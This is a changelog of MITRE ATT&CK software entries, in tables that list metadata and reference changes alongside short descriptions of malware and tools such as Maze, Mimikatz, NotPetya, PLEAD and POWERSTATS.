| [Maze](https://attack.mitre.org/software/S0449) ransomware, previously known as "ChaCha", was discovered in May 2019. In addition to encrypting files on victim machines for impact, [Maze](https://attack.mitre.org/software/S0449) operators conduct information stealing campaigns prior to encryption and post the information online to extort affected companies.(Citation: FireEye Maze May 2020)(Citation: McAfee Maze March 2020)(Citation: Sophos Maze VM September 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-18 23:46:05.071000+00:00 | 2022-01-24 17:01:08.605000+00:00 |
| Description |
|---|
| [Metamorfo](https://attack.mitre.org/software/S0455) is a Latin-American banking trojan operated by a Brazilian cybercrime group that has been active since at least April 2018. The group focuses on targeting banks and cryptocurrency services in Brazil and Mexico.(Citation: Medium Metamorfo Apr 2020)(Citation: ESET Casbaneiro Oct 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-09-27 19:32:33.491000+00:00 | 2022-10-18 23:23:55.295000+00:00 |
| external_references[1]['source_name'] | Metamorfo | Casbaneiro |
| external_references[1]['description'] | (Citation: Medium Metamorfo Apr 2020)(Citation: ESET Casbaneiro Oct 2019) | (Citation: ESET Casbaneiro Oct 2019) |
| external_references[2]['source_name'] | Casbaneiro | Metamorfo |
| external_references[2]['description'] | (Citation: ESET Casbaneiro Oct 2019) | (Citation: Medium Metamorfo Apr 2020)(Citation: ESET Casbaneiro Oct 2019) |
| Description |
|---|
| [Mimikatz](https://attack.mitre.org/software/S0002) is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. (Citation: Deply Mimikatz) (Citation: Adsecurity Mimikatz Guide) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-05-20 14:25:59.596000+00:00 | 2022-08-03 15:07:11.534000+00:00 |
| x_mitre_version | 1.4 | 1.6 |
| Description |
|---|
| [MirageFox](https://attack.mitre.org/software/S0280) is a remote access tool used against Windows systems. It appears to be an upgraded version of a tool known as Mirage, which is a RAT believed to originate in 2012. (Citation: APT15 Intezer June 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 17:05:26.798000+00:00 | 2022-07-22 18:52:32.764000+00:00 |
| external_references[2]['url'] | https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/ | https://web.archive.org/web/20180615122133/https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/ |
| Old Description | New Description |
|---|---|
| [Mis-Type](https://attack.mitre.org/software/S0084) is a backdoor hybrid that was used by [Dust Storm](https://attack.mitre.org/groups/G0031) in 2012. (Citation: Cylance Dust Storm) | [Mis-Type](https://attack.mitre.org/software/S0084) is a backdoor hybrid that was used in [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) by 2012.(Citation: Cylance Dust Storm) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-20 18:16:03.001000+00:00 | 2022-09-30 20:04:42.419000+00:00 |
| description | [Mis-Type](https://attack.mitre.org/software/S0084) is a backdoor hybrid that was used by [Dust Storm](https://attack.mitre.org/groups/G0031) in 2012. (Citation: Cylance Dust Storm) | [Mis-Type](https://attack.mitre.org/software/S0084) is a backdoor hybrid that was used in [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) by 2012.(Citation: Cylance Dust Storm) |
| external_references[1]['description'] | Gross, J. (2016, February 23). Operation Dust Storm. Retrieved September 19, 2017. | Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021. |
| external_references[1]['url'] | https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf | https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf |
| x_mitre_version | 1.1 | 1.2 |
| Old Description | New Description |
|---|---|
| [Misdat](https://attack.mitre.org/software/S0083) is a backdoor that was used by [Dust Storm](https://attack.mitre.org/groups/G0031) from 2010 to 2011. (Citation: Cylance Dust Storm) | [Misdat](https://attack.mitre.org/software/S0083) is a backdoor that was used in [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) from 2010 to 2011.(Citation: Cylance Dust Storm) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-20 18:16:26.920000+00:00 | 2022-09-30 21:01:41.137000+00:00 |
| description | [Misdat](https://attack.mitre.org/software/S0083) is a backdoor that was used by [Dust Storm](https://attack.mitre.org/groups/G0031) from 2010 to 2011. (Citation: Cylance Dust Storm) | [Misdat](https://attack.mitre.org/software/S0083) is a backdoor that was used in [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) from 2010 to 2011.(Citation: Cylance Dust Storm) |
| external_references[1]['description'] | Gross, J. (2016, February 23). Operation Dust Storm. Retrieved September 19, 2017. | Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021. |
| external_references[1]['url'] | https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf | https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf |
| x_mitre_version | 1.1 | 1.2 |
| Description |
|---|
| [Mivast](https://attack.mitre.org/software/S0080) is a backdoor that has been used by [Deep Panda](https://attack.mitre.org/groups/G0009). It was reportedly used in the Anthem breach. (Citation: Symantec Black Vine) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-25 16:03:26.871000+00:00 | 2022-07-20 20:09:46.802000+00:00 |
| external_references[2]['url'] | http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-black-vine-cyberespionage-group.pdf | https://web.archive.org/web/20170823094836/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-black-vine-cyberespionage-group.pdf |
| Description |
|---|
| [Net Crawler](https://attack.mitre.org/software/S0056) is an intranet worm capable of extracting credentials using credential dumpers and spreading to systems on a network over SMB by brute forcing accounts with recovered passwords and using [PsExec](https://attack.mitre.org/software/S0029) to execute a copy of [Net Crawler](https://attack.mitre.org/software/S0056). (Citation: Cylance Cleaver) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-21 16:41:34.225000+00:00 | 2022-07-22 18:37:22.182000+00:00 |
| Old Description | New Description |
|---|---|
| [Ngrok](https://attack.mitre.org/software/S0508) is a legitimate reverse proxy tool that can create a secure tunnel to servers located behind firewalls or on local machines that do not have a public IP. [Ngrok](https://attack.mitre.org/software/S0508) has been leveraged by threat actors in several campaigns including use for lateral movement and data exfiltration.(Citation: Zdnet Ngrok September 2018)(Citation: FireEye Maze May 2020)(Citation: Cyware Ngrok May 2019) | [Ngrok](https://attack.mitre.org/software/S0508) is a legitimate reverse proxy tool that can create a secure tunnel to servers located behind firewalls or on local machines that do not have a public IP. [Ngrok](https://attack.mitre.org/software/S0508) has been leveraged by threat actors in several campaigns including use for lateral movement and data exfiltration.(Citation: Zdnet Ngrok September 2018)(Citation: FireEye Maze May 2020)(Citation: Cyware Ngrok May 2019)(Citation: MalwareBytes LazyScripter Feb 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-09-29 20:46:04.658000+00:00 | 2022-04-06 19:49:28.441000+00:00 |
| description | [Ngrok](https://attack.mitre.org/software/S0508) is a legitimate reverse proxy tool that can create a secure tunnel to servers located behind firewalls or on local machines that do not have a public IP. [Ngrok](https://attack.mitre.org/software/S0508) has been leveraged by threat actors in several campaigns including use for lateral movement and data exfiltration.(Citation: Zdnet Ngrok September 2018)(Citation: FireEye Maze May 2020)(Citation: Cyware Ngrok May 2019) | [Ngrok](https://attack.mitre.org/software/S0508) is a legitimate reverse proxy tool that can create a secure tunnel to servers located behind firewalls or on local machines that do not have a public IP. [Ngrok](https://attack.mitre.org/software/S0508) has been leveraged by threat actors in several campaigns including use for lateral movement and data exfiltration.(Citation: Zdnet Ngrok September 2018)(Citation: FireEye Maze May 2020)(Citation: Cyware Ngrok May 2019)(Citation: MalwareBytes LazyScripter Feb 2021) |
| external_references[2]['source_name'] | FireEye Maze May 2020 | Cyware Ngrok May 2019 |
| external_references[2]['description'] | Kennelly, J., Goody, K., Shilko, J. (2020, May 7). Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents. Retrieved May 18, 2020. | Cyware. (2019, May 29). Cyber attackers leverage tunneling service to drop Lokibot onto victims’ systems. Retrieved September 15, 2020. |
| external_references[2]['url'] | https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html | https://cyware.com/news/cyber-attackers-leverage-tunneling-service-to-drop-lokibot-onto-victims-systems-6f610e44 |
| external_references[3]['source_name'] | Cyware Ngrok May 2019 | MalwareBytes LazyScripter Feb 2021 |
| external_references[3]['description'] | Cyware. (2019, May 29). Cyber attackers leverage tunneling service to drop Lokibot onto victims’ systems. Retrieved September 15, 2020. | Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 24, 2021. |
| external_references[3]['url'] | https://cyware.com/news/cyber-attackers-leverage-tunneling-service-to-drop-lokibot-onto-victims-systems-6f610e44 | https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'FireEye Maze May 2020', 'description': 'Kennelly, J., Goody, K., Shilko, J. (2020, May 7). Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents. Retrieved May 18, 2020.', 'url': 'https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html'} |
| Description |
|---|
| [Nidiran](https://attack.mitre.org/software/S0118) is a custom backdoor developed and used by [Suckfly](https://attack.mitre.org/groups/G0039). It has been delivered via strategic web compromise. (Citation: Symantec Suckfly March 2016) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-18 15:21:51.702000+00:00 | 2022-04-15 16:27:20.897000+00:00 |
| external_references[1]['description'] | DiMaggio, J.. (2016, March 15). Suckfly: Revealing the secret life of your code signing certificates. Retrieved August 3, 2016. | DiMaggio, J. (2016, March 15). Suckfly: Revealing the secret life of your code signing certificates. Retrieved August 3, 2016. |
| Description |
|---|
| [NotPetya](https://attack.mitre.org/software/S0368) is malware that was used by [Sandworm Team](https://attack.mitre.org/groups/G0034) in a worldwide attack starting on June 27, 2017. While [NotPetya](https://attack.mitre.org/software/S0368) appears as a form of ransomware, its main purpose was to destroy data and disk structures on compromised systems; the attackers never intended to make the encrypted data recoverable. As such, [NotPetya](https://attack.mitre.org/software/S0368) may be more appropriately thought of as a form of wiper malware. [NotPetya](https://attack.mitre.org/software/S0368) contains worm-like features to spread itself across a computer network using the SMBv1 exploits EternalBlue and EternalRomance.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)(Citation: ESET Telebots June 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-23 19:31:47.185000+00:00 | 2022-04-25 14:00:00.188000+00:00 |
| Description |
|---|
| [OSX/Shlayer](https://attack.mitre.org/software/S0402) is a Trojan designed to install adware on macOS that was first discovered in 2018.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-16 20:44:20.719000+00:00 | 2022-10-19 16:35:18.493000+00:00 |
| external_references[2]['source_name'] | Zshlayer | Crossrider |
| external_references[2]['description'] | (Citation: sentinelone shlayer to zshlayer) | (Citation: Intego Shlayer Apr 2018)(Citation: Malwarebytes Crossrider Apr 2018) |
| external_references[3]['source_name'] | Crossrider | Zshlayer |
| external_references[3]['description'] | (Citation: Intego Shlayer Apr 2018)(Citation: Malwarebytes Crossrider Apr 2018) | (Citation: sentinelone shlayer to zshlayer) |
| external_references[4]['url'] | https://www.carbonblack.com/2019/02/12/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/ | https://blogs.vmware.com/security/2020/02/vmware-carbon-black-tau-threat-analysis-shlayer-macos.html |
| external_references[7]['source_name'] | Intego Shlayer Apr 2018 | Malwarebytes Crossrider Apr 2018 |
| external_references[7]['description'] | Vrijenhoek, Jay. (2018, April 24). New OSX/Shlayer Malware Variant Found Using a Dirty New Trick. Retrieved September 6, 2019. | Reed, Thomas. (2018, April 24). New Crossrider variant installs configuration profiles on Macs. Retrieved September 6, 2019. |
| external_references[7]['url'] | https://www.intego.com/mac-security-blog/new-osxshlayer-malware-variant-found-using-a-dirty-new-trick/ | https://blog.malwarebytes.com/threat-analysis/2018/04/new-crossrider-variant-installs-configuration-profiles-on-macs/ |
| external_references[8]['source_name'] | Malwarebytes Crossrider Apr 2018 | Intego Shlayer Apr 2018 |
| external_references[8]['description'] | Reed, Thomas. (2018, April 24). New Crossrider variant installs configuration profiles on Macs. Retrieved September 6, 2019. | Vrijenhoek, Jay. (2018, April 24). New OSX/Shlayer Malware Variant Found Using a Dirty New Trick. Retrieved September 6, 2019. |
| external_references[8]['url'] | https://blog.malwarebytes.com/threat-analysis/2018/04/new-crossrider-variant-installs-configuration-profiles-on-macs/ | https://www.intego.com/mac-security-blog/new-osxshlayer-malware-variant-found-using-a-dirty-new-trick/ |
| x_mitre_version | 1.2 | 1.3 |
| Description |
|---|
| [OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) is a MacOS backdoor with several variants that has been used by [APT32](https://attack.mitre.org/groups/G0050).(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 01:59:21.279000+00:00 | 2022-01-14 21:53:00.543000+00:00 |
| x_mitre_version | 2.1 | 2.2 |
| Description |
|---|
| [Octopus](https://attack.mitre.org/software/S0340) is a Windows Trojan written in the Delphi programming language that has been used by [Nomadic Octopus](https://attack.mitre.org/groups/G0133) to target government organizations in Central Asia since at least 2014.(Citation: Securelist Octopus Oct 2018)(Citation: Security Affairs DustSquad Oct 2018)(Citation: ESET Nomadic Octopus 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 02:42:45.953000+00:00 | 2022-04-06 17:15:58.173000+00:00 |
| external_references[2]['source_name'] | Securelist Octopus Oct 2018 | ESET Nomadic Octopus 2018 |
| external_references[2]['description'] | Kaspersky Lab's Global Research & Analysis Team. (2018, October 15). Octopus-infested seas of Central Asia. Retrieved November 14, 2018. | Cherepanov, A. (2018, October 4). Nomadic Octopus Cyber espionage in Central Asia. Retrieved October 13, 2021. |
| external_references[2]['url'] | https://securelist.com/octopus-infested-seas-of-central-asia/88200/ | https://www.virusbulletin.com/uploads/pdf/conference_slides/2018/Cherepanov-VB2018-Octopus.pdf |
| external_references[3]['source_name'] | Security Affairs DustSquad Oct 2018 | Securelist Octopus Oct 2018 |
| external_references[3]['description'] | Paganini, P. (2018, October 16). Russia-linked APT group DustSquad targets diplomatic entities in Central Asia. Retrieved August 24, 2021. | Kaspersky Lab's Global Research & Analysis Team. (2018, October 15). Octopus-infested seas of Central Asia. Retrieved November 14, 2018. |
| external_references[3]['url'] | https://securityaffairs.co/wordpress/77165/apt/russia-linked-apt-dustsquad.html | https://securelist.com/octopus-infested-seas-of-central-asia/88200/ |
| external_references[4]['source_name'] | ESET Nomadic Octopus 2018 | Security Affairs DustSquad Oct 2018 |
| external_references[4]['description'] | Cherepanov, A. (2018, October 4). Nomadic Octopus Cyber espionage in Central Asia. Retrieved October 13, 2021. | Paganini, P. (2018, October 16). Russia-linked APT group DustSquad targets diplomatic entities in Central Asia. Retrieved August 24, 2021. |
| external_references[4]['url'] | https://www.virusbulletin.com/uploads/pdf/conference_slides/2018/Cherepanov-VB2018-Octopus.pdf | https://securityaffairs.co/wordpress/77165/apt/russia-linked-apt-dustsquad.html |
| Description |
|---|
| [Orz](https://attack.mitre.org/software/S0229) is a custom JavaScript backdoor used by [Leviathan](https://attack.mitre.org/groups/G0065). It was observed being used in 2014 as well as in August 2017 when it was dropped by Microsoft Publisher files. (Citation: Proofpoint Leviathan Oct 2017) (Citation: FireEye Periscope March 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-02-09 15:04:49.088000+00:00 | 2022-04-19 01:33:33.267000+00:00 |
| external_references[1]['source_name'] | Orz | AIRBREAK |
| external_references[1]['description'] | (Citation: Proofpoint Leviathan Oct 2017) | (Citation: FireEye Periscope March 2018) |
| external_references[2]['source_name'] | AIRBREAK | Orz |
| external_references[2]['description'] | (Citation: FireEye Periscope March 2018) | (Citation: Proofpoint Leviathan Oct 2017) |
| x_mitre_version | 2.1 | 2.2 |
| Old Description | New Description |
|---|---|
| [PLEAD](https://attack.mitre.org/software/S0435) is a remote access tool (RAT) and downloader used by [BlackTech](https://attack.mitre.org/groups/G0098) in targeted attacks in East Asia including Taiwan, Japan, and Hong Kong.(Citation: TrendMicro BlackTech June 2017)(Citation: JPCert PLEAD Downloader June 2018) [PLEAD](https://attack.mitre.org/software/S0435) has also been referred to as [TSCookie](https://attack.mitre.org/software/S0436), though more recent reporting indicates likely separation between the two.(Citation: JPCert TSCookie March 2018)(Citation: JPCert PLEAD Downloader June 2018) | [PLEAD](https://attack.mitre.org/software/S0435) is a remote access tool (RAT) and downloader used by [BlackTech](https://attack.mitre.org/groups/G0098) in targeted attacks in East Asia including Taiwan, Japan, and Hong Kong.(Citation: TrendMicro BlackTech June 2017)(Citation: JPCert PLEAD Downloader June 2018) [PLEAD](https://attack.mitre.org/software/S0435) has also been referred to as [TSCookie](https://attack.mitre.org/software/S0436), though more recent reporting indicates likely separation between the two. [PLEAD](https://attack.mitre.org/software/S0435) was observed in use as early as March 2017.(Citation: JPCert TSCookie March 2018)(Citation: JPCert PLEAD Downloader June 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | https://blog.trendmicro.com/trendlabs-security-intelligence/plead-targeted-attacks-against-taiwanese-government-agencies-2/ |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-07-04 01:44:16.182000+00:00 | 2022-04-15 11:32:25.173000+00:00 |
| description | [PLEAD](https://attack.mitre.org/software/S0435) is a remote access tool (RAT) and downloader used by [BlackTech](https://attack.mitre.org/groups/G0098) in targeted attacks in East Asia including Taiwan, Japan, and Hong Kong.(Citation: TrendMicro BlackTech June 2017)(Citation: JPCert PLEAD Downloader June 2018) [PLEAD](https://attack.mitre.org/software/S0435) has also been referred to as [TSCookie](https://attack.mitre.org/software/S0436), though more recent reporting indicates likely separation between the two.(Citation: JPCert TSCookie March 2018)(Citation: JPCert PLEAD Downloader June 2018) | [PLEAD](https://attack.mitre.org/software/S0435) is a remote access tool (RAT) and downloader used by [BlackTech](https://attack.mitre.org/groups/G0098) in targeted attacks in East Asia including Taiwan, Japan, and Hong Kong.(Citation: TrendMicro BlackTech June 2017)(Citation: JPCert PLEAD Downloader June 2018) [PLEAD](https://attack.mitre.org/software/S0435) has also been referred to as [TSCookie](https://attack.mitre.org/software/S0436), though more recent reporting indicates likely separation between the two. [PLEAD](https://attack.mitre.org/software/S0435) was observed in use as early as March 2017.(Citation: JPCert TSCookie March 2018)(Citation: JPCert PLEAD Downloader June 2018) |
| external_references[1]['source_name'] | PLEAD | Trend Micro PLEAD RTLO |
| external_references[1]['description'] | PLEAD derived its name from letters used in backdoor commands in intrusion campaigns.(Citation: Trend Micro PLEAD RTLO) | Alintanahin, K.. (2014, May 23). PLEAD Targeted Attacks Against Taiwanese Government Agencies. Retrieved April 22, 2019. |
| external_references[3]['source_name'] | JPCert PLEAD Downloader June 2018 | PLEAD |
| external_references[3]['description'] | Tomonaga, S.. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020. | PLEAD derived its name from letters used in backdoor commands in intrusion campaigns.(Citation: Trend Micro PLEAD RTLO)(Citation: TrendMicro BlackTech June 2017) |
| external_references[4]['source_name'] | JPCert TSCookie March 2018 | JPCert PLEAD Downloader June 2018 |
| external_references[4]['description'] | Tomonaga, S.. (2018, March 6). Malware “TSCookie”. Retrieved May 6, 2020. | Tomonaga, S. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020. |
| external_references[5]['source_name'] | Trend Micro PLEAD RTLO | JPCert TSCookie March 2018 |
| external_references[5]['description'] | Alintanahin, K.. (2014, May 23). PLEAD Targeted Attacks Against Taiwanese Government Agencies. Retrieved April 22, 2019. | Tomonaga, S. (2018, March 6). Malware “TSCookie”. Retrieved May 6, 2020. |
| external_references[5]['url'] | https://blog.trendmicro.com/trendlabs-security-intelligence/plead-targeted-attacks-against-taiwanese-government-agencies-2/ | https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html |
| x_mitre_version | 1.0 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Hannah Simes, BT Security |
| Description |
|---|
| [POWERSOURCE](https://attack.mitre.org/software/S0145) is a PowerShell backdoor that is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. It was observed in February 2017 in spearphishing campaigns against personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations. The malware was delivered when macros were enabled by the victim and a VBS script was dropped. (Citation: FireEye FIN7 March 2017) (Citation: Cisco DNSMessenger March 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 17:17:35.369000+00:00 | 2022-07-20 20:06:44.707000+00:00 |
| external_references[3]['source_name'] | FireEye FIN7 March 2017 | Cisco DNSMessenger March 2017 |
| external_references[3]['description'] | Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017. | Brumaghin, E. and Grady, C.. (2017, March 2). Covert Channels and Poor Decisions: The Tale of DNSMessenger. Retrieved March 8, 2017. |
| external_references[3]['url'] | https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html | http://blog.talosintelligence.com/2017/03/dnsmessenger.html |
| external_references[4]['source_name'] | Cisco DNSMessenger March 2017 | FireEye FIN7 March 2017 |
| external_references[4]['description'] | Brumaghin, E. and Grady, C.. (2017, March 2). Covert Channels and Poor Decisions: The Tale of DNSMessenger. Retrieved March 8, 2017. | Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017. |
| external_references[4]['url'] | http://blog.talosintelligence.com/2017/03/dnsmessenger.html | https://web.archive.org/web/20180808125108/https:/www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html |
| Description |
|---|
| [POWERSTATS](https://attack.mitre.org/software/S0223) is a PowerShell-based first stage backdoor used by [MuddyWater](https://attack.mitre.org/groups/G0069). (Citation: Unit 42 MuddyWater Nov 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-23 20:16:28.982000+00:00 | 2022-10-12 19:06:51.405000+00:00 |
| external_references[1]['source_name'] | POWERSTATS | Powermud |
| external_references[1]['description'] | (Citation: Unit 42 MuddyWater Nov 2017)(Citation: ClearSky MuddyWater Nov 2018) | (Citation: Symantec MuddyWater Dec 2018) |
| external_references[2]['source_name'] | Powermud | POWERSTATS |
| external_references[2]['description'] | (Citation: Symantec MuddyWater Dec 2018) | (Citation: Unit 42 MuddyWater Nov 2017)(Citation: ClearSky MuddyWater Nov 2018) |
| external_references[3]['source_name'] | Unit 42 MuddyWater Nov 2017 | ClearSky MuddyWater Nov 2018 |
| external_references[3]['description'] | Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018. | ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018. |
| external_references[3]['url'] | https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/ | https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf |
| external_references[4]['source_name'] | ClearSky MuddyWater Nov 2018 | Unit 42 MuddyWater Nov 2017 |
| external_references[4]['description'] | ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018. | Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018. |
| external_references[4]['url'] | https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf | https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/ |
| x_mitre_version | 2.1 | 2.2 |
| Description |
|---|
